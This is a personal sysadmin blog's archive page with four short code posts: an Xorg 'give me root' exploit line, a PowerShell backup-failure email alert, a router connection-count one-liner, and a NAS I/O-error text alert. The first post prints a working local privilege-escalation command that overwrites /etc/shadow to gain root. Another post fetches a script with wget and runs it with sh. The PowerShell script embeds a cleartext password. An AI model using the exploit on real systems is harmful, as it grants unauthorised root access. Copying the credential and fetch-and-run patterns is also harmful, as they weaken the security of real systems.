Code


eXploit X : “Give Me Root” – Computerphile

by on Nov.11, 2018, under Code, Exploits, Posts, Videos

Example of exploit: cd /etc; Xorg -fp “root::16431:0:99999:7:::” -logfile shadow :1;su

This is just another reason why if you run a headless server, to not have Xorg or a GUI installed. Reduce the attack surface as much as you can.

Leave a Comment :, , , , , , , , , more...

K.I.S.S. Windows Server Backup Failure Notification Powershell script

by on May.03, 2018, under Code, Posts

$value = get-wbsummary | select -expandproperty lastbackupresulthr

if ( $value -ne 0 )
{
$EmailFrom = “YourGmailAccount@gmail.com”
$EmailTo = “WhoYouWantTonotify@domain.com”
$Subject = “Notification from Windows Server Backup”
$Body = “Last backup may have failed…”
$SMTPServer = “smtp.gmail.com”
$SMTPClient = New-Object Net.Mail.SmtpClient($SmtpServer, 587)
$SMTPClient.EnableSsl = $true
$SMTPClient.Credentials = New-Object System.Net.NetworkCredential(“YourGmailAccount”, “yourcleartextpassword”);
$SMTPClient.Send($EmailFrom, $EmailTo, $Subject, $Body)
}

The code is pretty self explanatory. (The main block I just found from howtogeek.com) Granted it is not secure because it’s storing a cleartext password. You can save this in a .ps1 file and create a scheduled task that runs with at least admin privileges (the function ‘get-wbsummary’ requires admin rights) after a backup has ran.

The $EmailTo variable you could use an SMS gateway to get a text notification. (See this list.) For instance if your phone number is 6165559876 and you have Verizon, it would look like this: $EmailTo = 6165559876@vtext.com.

Leave a Comment :, , , , , , , , , , , , more...

Connection counting on your *nix based router/appliance

by on Feb.07, 2017, under Code, Posts

At my work in the past we’ve had to hunt down infected systems that have caused networks to come to a near standstill and their WAN IP/email DNS name to become blacklisted. On routers with dd-wrt, there’s a nice feature where you can see a connection count per each system. A majority of the time we have discovered that systems with very high connection counts tend to be infected and cause network issues. Unfortunately, dd-wrt doesn’t really cut it anymore for our needs and we had to shift over toward different firmware alternatives (like http://tomato.groov.pl/?page_id=164 or https://www.snbforums.com/threads/fork-asuswrt-merlin-374-43-lts-releases-v22e4-23b8.18914/ ). However, these alternatives tend to not have a connection count feature. After some googling, I’ve found a work around if you can get ssh or telnet access to the device:

cat /proc/net/ip_conntrack | awk '{print $5}'| cut -d: -f1 | sort | uniq -c | sort -nr | fgrep "$(ifconfig br0 | grep "inet addr" | awk '{print $2}' | sed 's/addr://g' | cut -d. -f1-3)"

You can download from my website and run it this way:

wget http://zitstif.no-ip.org/concount; watch -n 1 ‘/bin/sh concount’

Leave a Comment :, , , , , , more...

I/O error text message notification

by on Dec.31, 2016, under Code, Posts

Recently a good friend be-gifted me Banana PI M3 for my birthday. I decided to turn it into a NAS. Granted it is no Synology NAS but it gets the job done and openmediavault is a wonderful software suite to use on it. I thought to myself, “It would be nice to get a notification if there are any I/O errors via dmesg on my homemade NAS. So I whipped up a simple solution:

vim /bin/ioerrorcontact

#!/bin/bash

if dmesg | fgrep ‘I/O error’ &> /dev/null;
then
curl http://textbelt.com/text -d number=MyPhoneNumber -d message=”I/O Error on your NAS” &> /dev/null;
fi

crontab -e

0 * * * *       bash /bin/ioerrorcontact

This is just a quick and simple hack but it’s peace of mind knowing that I have something in place to notify me if my simple NAS is having any issues, especially since I do not have RAID 1 configured on it. RAID 1 via BananaPi or really any other Pi devices at this point isn’t really that great because you would have the split one SATA channel/bandwidth to be able to get it to work. I also strongly recommend that if you’re going to build a low powered NAS device using a Pi device, to use the BananaPi because it has gigabit Ethernet. Other than that, if you have the money to shell out and want a better solution, I recommend Synology NAS products.

#Update 4/14/2017

Textbelt.com now requires a key parameter and is no longer ‘free’:

Leave a Comment :, , , , , , , more...

Looking for something?

Use the form below to search the site:

Still not finding what you're looking for? Drop a comment on a post or contact us so we can take care of it!